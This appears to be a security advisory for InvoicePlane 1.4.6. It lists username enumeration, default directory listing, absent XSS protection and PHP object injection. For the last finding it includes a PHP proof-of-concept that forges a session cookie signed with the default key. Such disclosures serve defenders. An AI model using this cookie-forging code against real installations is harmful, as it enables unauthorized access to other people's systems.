software:		invoice plane
version: 		1.4.6
URL:			https://invoiceplane.com/

Researcher:		Ross Marks
URL: 			http://www.rossmarks.co.uk

1) username enumeration
	wrong username: There is no account registered with this Email address.
	wrong password: Email or Password incorrect.

2) directory listing enabled by default
	/invoice_plane/uploads/
	/invoice_plane/assets/

3) Persistant & Reflected XSS everywhere
	there is NO xss protection implemented

4) Object Injection via session cookie
   example, set result of following as cookie:

		<?php
		/***
		 * change these to reflect environment
		 */
			$private_key="invoiceplane";

			class objName {
				var	$var = "content";
			}
		/***
		 * change $obj to reflect class, leave everything else
		 */
			$obj = new objName();
			$seralized = serialize($obj);
			$hash = hash_hmac('sha1', $seralized, $private_key);
			echo urlencode($seralized).$hash."\n";
		?>